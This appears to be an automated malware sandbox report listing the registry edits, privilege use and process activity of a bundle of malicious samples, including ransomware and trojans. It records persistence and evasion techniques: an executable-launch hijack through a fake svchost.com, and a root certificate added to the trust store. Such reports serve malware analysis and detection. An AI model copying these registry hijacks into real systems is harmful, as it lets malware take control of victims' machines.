Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9F1A87F0-AF3D-11EE-80FA-EAAD54D9E991} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe N/A
N/A N/A C:\Users\Admin\Desktop\8.exe N/A
N/A N/A C:\Users\Admin\Desktop\8.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe N/A
N/A N/A C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\6.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
